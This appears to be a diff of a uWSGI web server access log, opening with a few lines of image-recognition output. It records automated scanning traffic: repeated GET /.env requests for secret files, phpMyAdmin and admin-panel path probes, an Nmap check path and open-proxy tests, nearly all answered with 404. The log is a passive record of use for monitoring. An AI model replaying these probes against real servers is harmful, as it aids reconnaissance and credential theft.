-[{'bbox': [0, 0, 412, 664], 'rec_docs': '江小白', 'rec_scores': 0.7806603}] -{'bbox': [0, 0, 412, 664], 'rec_docs': '江小白', 'rec_scores': 0.7806603} -234 -["{'bbox': [0, 0, 412, 664], 'rec_docs': '江小白', 'rec_scores': 0.7806603}\n"] -['江小白'] -['江小白', '30'] -[pid: 32766|app: 0|req: 11/28] 61.165.110.154 () {42 vars in 833 bytes} [Wed Nov 3 04:39:22 2021] POST /reference/ => generated 108 bytes in 6253 msecs (HTTP/1.1 200) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 713/838] 125.94.202.110 () {34 vars in 450 bytes} [Tue Feb 8 14:19:02 2022] POST /reference_client/ => generated 98 bytes in 3065 msecs (HTTP/1.1 200) 5 headers in 157 bytes (19 switches on core 0) +[pid: 19148|app: 0|req: 714/839] 106.14.80.184 () {22 vars in 234 bytes} [Tue Feb 8 14:27:56 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 715/840] 106.14.80.184 () {22 vars in 295 bytes} [Tue Feb 8 14:27:59 2022] GET /nice%20ports%2C/Tri%6Eity.txt%2ebak => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 716/841] 106.14.80.184 () {22 vars in 238 bytes} [Tue Feb 8 14:28:02 2022] OPTIONS / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 717/842] 106.14.80.184 () {22 vars in 238 bytes} [Tue Feb 8 14:28:04 2022] OPTIONS / => generated 179 bytes in 1 msecs (RTSP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 718/843] 106.14.80.184 () {40 vars in 484 bytes} [Tue Feb 8 14:28:05 2022] OPTIONS sip:nm => generated 179 bytes in 1 msecs (SIP/2.0 404) 5 headers in 157 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 719/844] 8.142.7.214 () {24 vars in 257 bytes} [Tue Feb 8 14:30:50 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 720/845] 8.142.7.214 () {34 vars in 635 bytes} [Tue Feb 8 14:30:52 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 721/846] 8.142.7.214 () {26 vars in 310 bytes} [Tue Feb 8 14:30:57 2022] GET /robots.txt => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 722/847] 8.142.7.214 () {26 vars in 312 bytes} [Tue Feb 8 14:30:57 2022] GET /sitemap.xml => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 723/848] 8.142.44.201 () {38 vars in 678 bytes} [Tue Feb 8 14:39:01 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 724/849] 8.142.44.201 () {30 vars in 355 bytes} [Tue Feb 8 14:39:10 2022] GET /sitemap.xml => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 725/850] 8.142.44.201 () {30 vars in 353 bytes} [Tue Feb 8 14:39:12 2022] GET /robots.txt => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 726/851] 192.241.211.249 () {34 vars in 395 bytes} [Tue Feb 8 15:15:24 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 727/852] 179.43.170.170 () {40 vars in 629 bytes} [Tue Feb 8 16:59:10 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 728/853] 212.154.7.246 () {36 vars in 523 bytes} [Tue Feb 8 18:01:51 2022] GET /.env => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 729/854] 212.154.7.246 () {40 vars in 630 bytes} [Tue Feb 8 18:01:52 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 730/855] 161.189.134.11 () {40 vars in 725 bytes} [Tue Feb 8 18:08:42 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 731/856] 2.57.121.44 () {34 vars in 400 bytes} [Tue Feb 8 18:28:17 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 732/857] 83.97.20.34 () {30 vars in 329 bytes} [Tue Feb 8 19:30:14 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 733/858] 103.113.106.13 () {32 vars in 464 bytes} [Tue Feb 8 19:31:32 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 734/859] 62.171.150.168 () {28 vars in 311 bytes} [Tue Feb 8 19:32:16 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 735/860] 62.171.150.168 () {40 vars in 678 bytes} [Tue Feb 8 19:32:16 2022] POST /HNAP1/ => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 736/861] 177.126.57.15 () {32 vars in 464 bytes} [Tue Feb 8 19:58:41 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 737/862] 70.45.130.135 () {28 vars in 307 bytes} [Tue Feb 8 20:04:14 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 738/863] 66.240.236.109 () {34 vars in 394 bytes} [Tue Feb 8 20:10:27 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 739/864] 195.222.125.6 () {32 vars in 463 bytes} [Tue Feb 8 20:24:03 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 740/865] 162.142.125.219 () {28 vars in 312 bytes} [Tue Feb 8 20:37:47 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 741/866] 162.142.125.219 () {34 vars in 444 bytes} [Tue Feb 8 20:37:47 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 742/867] 103.207.42.166 () {36 vars in 590 bytes} [Tue Feb 8 20:46:58 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 743/868] 103.207.42.166 () {40 vars in 697 bytes} [Tue Feb 8 20:47:05 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 744/869] 2.57.121.44 () {34 vars in 400 bytes} [Tue Feb 8 21:01:06 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 745/870] 83.97.20.34 () {26 vars in 286 bytes} [Tue Feb 8 21:03:41 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 746/871] 47.103.5.27 () {34 vars in 457 bytes} [Tue Feb 8 21:37:36 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 747/872] 20.55.53.144 () {34 vars in 549 bytes} [Tue Feb 8 21:39:49 2022] GET /jNvcer7Vzs29K3EqoQxSCipR6Ic => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 748/873] 209.17.97.74 () {30 vars in 409 bytes} [Tue Feb 8 22:40:04 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 749/874] 71.6.232.4 () {34 vars in 484 bytes} [Wed Feb 9 00:06:03 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 750/875] 39.103.163.218 () {32 vars in 503 bytes} [Wed Feb 9 00:36:41 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 751/876] 138.122.20.79 () {32 vars in 464 bytes} [Wed Feb 9 01:08:37 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 752/877] 83.97.20.34 () {30 vars in 329 bytes} [Wed Feb 9 01:12:42 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 753/878] 144.91.92.127 () {40 vars in 630 bytes} [Wed Feb 9 01:15:47 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 754/879] 144.91.92.127 () {36 vars in 523 bytes} [Wed Feb 9 01:15:48 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 755/880] 183.136.225.56 () {34 vars in 456 bytes} [Wed Feb 9 01:53:17 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 756/881] 222.186.46.200 () {30 vars in 501 bytes} [Wed Feb 9 02:24:37 2022] GET http://ip.ws.126.net/ipquery => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19143|app: 0|req: 8/882] 222.186.46.200 () {30 vars in 514 bytes} [Wed Feb 9 02:24:37 2022] GET http://ip.ws.126.net/ipquery => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 757/883] 89.248.171.23 () {44 vars in 773 bytes} [Wed Feb 9 02:26:29 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 758/884] 168.119.143.102 () {44 vars in 719 bytes} [Wed Feb 9 02:26:32 2022] GET /favicon.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 759/885] 83.97.20.34 () {26 vars in 287 bytes} [Wed Feb 9 02:54:58 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 760/886] 170.130.187.10 () {30 vars in 373 bytes} [Wed Feb 9 03:23:23 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 761/887] 179.43.170.170 () {40 vars in 629 bytes} [Wed Feb 9 04:46:58 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 762/888] 167.248.133.45 () {28 vars in 311 bytes} [Wed Feb 9 05:05:44 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 763/889] 167.248.133.45 () {34 vars in 443 bytes} [Wed Feb 9 05:05:44 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 764/890] 83.143.86.62 () {34 vars in 402 bytes} [Wed Feb 9 05:43:27 2022] GET /forum => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 765/891] 83.143.86.62 () {34 vars in 406 bytes} [Wed Feb 9 05:43:28 2022] GET /admincp => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 766/892] 59.120.70.142 () {30 vars in 436 bytes} [Wed Feb 9 06:36:55 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 68/893] 65.154.226.165 () {44 vars in 766 bytes} [Wed Feb 9 06:37:43 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 767/894] 179.43.170.170 () {40 vars in 629 bytes} [Wed Feb 9 06:42:38 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 768/895] 39.99.152.50 () {34 vars in 410 bytes} [Wed Feb 9 06:59:37 2022] POST /sdk => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 769/896] 39.99.152.50 () {28 vars in 306 bytes} [Wed Feb 9 06:59:37 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 770/897] 39.99.152.50 () {32 vars in 408 bytes} [Wed Feb 9 06:59:37 2022] GET /text4041644389977 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 771/898] 39.99.152.50 () {32 vars in 394 bytes} [Wed Feb 9 06:59:37 2022] GET /evox/about => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 772/899] 39.99.152.50 () {32 vars in 384 bytes} [Wed Feb 9 06:59:37 2022] GET /HNAP1 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 773/900] 39.99.152.50 () {36 vars in 462 bytes} [Wed Feb 9 06:59:48 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 774/901] 39.99.152.50 () {34 vars in 413 bytes} [Wed Feb 9 06:59:48 2022] GET /favicon.ico => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 775/902] 109.237.103.118 () {36 vars in 525 bytes} [Wed Feb 9 08:01:32 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 776/903] 167.94.138.44 () {30 vars in 400 bytes} [Wed Feb 9 08:30:24 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 777/904] 167.94.138.44 () {22 vars in 234 bytes} [Wed Feb 9 08:30:28 2022] PRI * => generated 179 bytes in 1 msecs (HTTP/2.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 778/905] 23.251.102.82 () {34 vars in 487 bytes} [Wed Feb 9 08:35:00 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 779/906] 83.97.20.34 () {26 vars in 286 bytes} [Wed Feb 9 08:41:50 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 780/907] 109.237.103.38 () {36 vars in 524 bytes} [Wed Feb 9 09:27:32 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 781/908] 193.37.255.114 () {30 vars in 490 bytes} [Wed Feb 9 10:21:09 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 782/909] 193.37.255.114 () {32 vars in 473 bytes} [Wed Feb 9 10:21:11 2022] GET /favicon.ico => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 783/910] 179.43.170.170 () {40 vars in 629 bytes} [Wed Feb 9 12:19:05 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 784/911] 82.76.165.109 () {36 vars in 523 bytes} [Wed Feb 9 12:49:24 2022] GET /.env => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 785/912] 82.76.165.109 () {40 vars in 630 bytes} [Wed Feb 9 12:49:25 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 786/913] 184.105.139.67 () {28 vars in 308 bytes} [Wed Feb 9 12:56:33 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 787/914] 83.97.20.34 () {30 vars in 329 bytes} [Wed Feb 9 13:17:06 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 788/915] 83.97.20.34 () {26 vars in 287 bytes} [Wed Feb 9 14:33:11 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 789/916] 193.118.53.210 () {34 vars in 488 bytes} [Wed Feb 9 15:39:04 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 790/917] 183.136.225.56 () {34 vars in 534 bytes} [Wed Feb 9 17:17:07 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 791/918] 94.73.19.43 () {32 vars in 462 bytes} [Wed Feb 9 18:08:19 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 792/919] 94.73.19.43 () {32 vars in 461 bytes} [Wed Feb 9 18:08:19 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 793/920] 94.73.19.43 () {32 vars in 462 bytes} [Wed Feb 9 18:08:19 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 794/921] 94.73.19.43 () {32 vars in 468 bytes} [Wed Feb 9 18:08:19 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 795/922] 94.73.19.43 () {32 vars in 462 bytes} [Wed Feb 9 18:08:19 2022] GET / => generated 179 bytes in 0 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 796/923] 94.73.19.43 () {32 vars in 462 bytes} [Wed Feb 9 18:08:19 2022] GET / => generated 179 bytes in 0 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 797/924] 94.73.19.43 () {32 vars in 461 bytes} [Wed Feb 9 18:08:19 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 69/925] 94.73.19.43 () {32 vars in 462 bytes} [Wed Feb 9 18:08:19 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 798/926] 94.73.19.43 () {32 vars in 462 bytes} [Wed Feb 9 18:08:19 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 799/927] 83.97.20.34 () {30 vars in 329 bytes} [Wed Feb 9 18:22:13 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 800/928] 157.245.116.178 () {32 vars in 441 bytes} [Wed Feb 9 19:38:21 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 801/929] 83.97.20.34 () {26 vars in 287 bytes} [Wed Feb 9 19:57:14 2022] GET / => generated 179 bytes in 4 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 802/930] 138.122.164.192 () {32 vars in 472 bytes} [Wed Feb 9 20:54:00 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 803/931] 165.154.21.120 () {30 vars in 329 bytes} [Wed Feb 9 22:58:35 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 804/932] 47.101.189.46 () {34 vars in 459 bytes} [Wed Feb 9 23:56:38 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 805/933] 101.133.140.205 () {22 vars in 236 bytes} [Thu Feb 10 00:19:10 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 70/934] 101.133.140.205 () {22 vars in 298 bytes} [Thu Feb 10 00:19:10 2022] GET /nice%20ports%2C/Tri%6Eity.txt%2ebak => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 806/935] 101.133.140.205 () {22 vars in 240 bytes} [Thu Feb 10 00:19:20 2022] OPTIONS / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 807/936] 101.133.140.205 () {22 vars in 240 bytes} [Thu Feb 10 00:19:24 2022] OPTIONS / => generated 179 bytes in 1 msecs (RTSP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 808/937] 101.133.140.205 () {40 vars in 485 bytes} [Thu Feb 10 00:19:29 2022] OPTIONS sip:nm => generated 179 bytes in 1 msecs (SIP/2.0 404) 5 headers in 157 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 809/938] 212.192.241.207 () {36 vars in 525 bytes} [Thu Feb 10 00:22:12 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 810/939] 212.192.241.207 () {40 vars in 632 bytes} [Thu Feb 10 00:22:13 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 811/940] 83.97.20.34 () {30 vars in 328 bytes} [Thu Feb 10 00:55:39 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 812/941] 209.17.96.90 () {30 vars in 409 bytes} [Thu Feb 10 01:29:23 2022] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 813/942] 139.198.168.128 () {38 vars in 721 bytes} [Thu Feb 10 01:44:20 2022] GET /phpmyadmin/index.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 814/943] 139.198.168.128 () {38 vars in 700 bytes} [Thu Feb 10 01:44:20 2022] GET /pmd/index.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 815/944] 139.198.168.128 () {38 vars in 736 bytes} [Thu Feb 10 01:44:20 2022] GET /phpmyadmin4.8.5/index.php => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 816/945] 83.97.20.34 () {26 vars in 287 bytes} [Thu Feb 10 02:14:55 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 817/946] 185.180.143.7 () {34 vars in 487 bytes} [Thu Feb 10 02:24:10 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 818/947] 101.133.132.65 () {34 vars in 427 bytes} [Thu Feb 10 02:37:02 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 819/948] 223.27.238.86 () {36 vars in 432 bytes} [Thu Feb 10 03:43:05 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 820/949] 223.27.238.86 () {32 vars in 390 bytes} [Thu Feb 10 03:43:05 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19147|app: 0|req: 71/950] 45.33.96.205 () {34 vars in 498 bytes} [Thu Feb 10 03:44:13 2022] GET /admin/ => generated 0 bytes in 2 msecs (HTTP/1.1 302) 9 headers in 331 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 821/951] 39.103.159.236 () {34 vars in 502 bytes} [Thu Feb 10 04:29:23 2022] POST /sdk => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 822/952] 39.103.159.236 () {32 vars in 514 bytes} [Thu Feb 10 04:29:38 2022] GET /nmaplowercheck1644467362 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 823/953] 39.103.159.236 () {32 vars in 486 bytes} [Thu Feb 10 04:29:38 2022] GET /evox/about => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 824/954] 39.103.159.236 () {32 vars in 476 bytes} [Thu Feb 10 04:29:45 2022] GET /HNAP1 => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 825/955] 39.103.159.236 () {28 vars in 308 bytes} [Thu Feb 10 04:29:55 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 826/956] 128.14.134.134 () {34 vars in 488 bytes} [Thu Feb 10 04:52:47 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 827/957] 192.241.212.10 () {34 vars in 422 bytes} [Thu Feb 10 05:32:55 2022] GET /portal/redlion => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 828/958] 83.97.20.34 () {30 vars in 329 bytes} [Thu Feb 10 05:51:13 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.0 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 829/959] 91.211.178.123 () {32 vars in 471 bytes} [Thu Feb 10 06:05:39 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 830/960] 192.241.208.45 () {34 vars in 424 bytes} [Thu Feb 10 06:09:25 2022] GET /actuator/health => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 831/961] 128.14.134.170 () {34 vars in 488 bytes} [Thu Feb 10 06:12:10 2022] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19148|app: 0|req: 